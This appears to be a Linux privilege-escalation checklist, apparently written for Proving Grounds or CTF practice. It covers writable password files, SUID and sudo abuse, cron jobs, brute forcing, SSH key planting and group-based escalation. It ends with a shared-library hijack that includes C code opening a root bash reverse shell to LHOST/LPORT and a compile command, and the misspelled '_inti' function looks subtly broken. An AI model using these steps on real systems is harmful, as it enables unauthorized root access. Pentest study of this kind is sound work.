- Writable
/etc/shadow - Writable
/etc/passwd - Check user's history
- Check user's
env - Check user's
.bashrc - SUID Bit
-
sudo -l- GTFOBins
- Try to read the binary (maybe it is
.shscript) - Run the binary as
sudo <binary-full-path>
- Cron Job
- There may be missing library for binary file we can write create and write it HINT
- Get the usernames from
/homestart brute force for the users - If you come from web check
config.php - Look for services like
mysql - Look for internal ports
- Password Reuse (get password from different resources like db, config files and reuse them)
- Username and the password the same like
patrick:patrick - Create a key pair using
ssh-keygencommand and then changeid_rsa.pubfile toauthorized_keysand add this file - Check group of the user:
- if it is
fail2bangroup fail2ban PrivEsc (PG-Practice Fail) - if it is
filtergroup filter PrivEsc-
find / -group filter 2>/dev/null
-
- if it is
dockergroup docker PrivSec
- if it is
- Service
find /etc -type f -writable 2> /dev/nullhttps://al1z4deh.medium.com/proving-grounds-hetemit-8469d0a3f189
- Check available commands
echo $PATH - [ ]
find / -group filter 2>/dev/null
- You find a binary file that may be run by root user (SUID or SUDO or CronJob)
- Try to run it
- If it gives missing like "cannot open shared object file"
- Check path
LD_LIBRARY_PATHin/etc/crontabfor example. - Find writable directory
find / -type d -writable 2>/dev/null
- Match writable directories with PATH
- Write a malicious .c file
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _inti() {
setgid(0);
setuid(0);
system("bash -i >& /dev/tcp/LHOST/LPORT 0>&1");
}
- Compile it
gcc -shared -fPIC -nostartfiles exploit.c -o exploit.so
- Put it to the target place
- Run the binary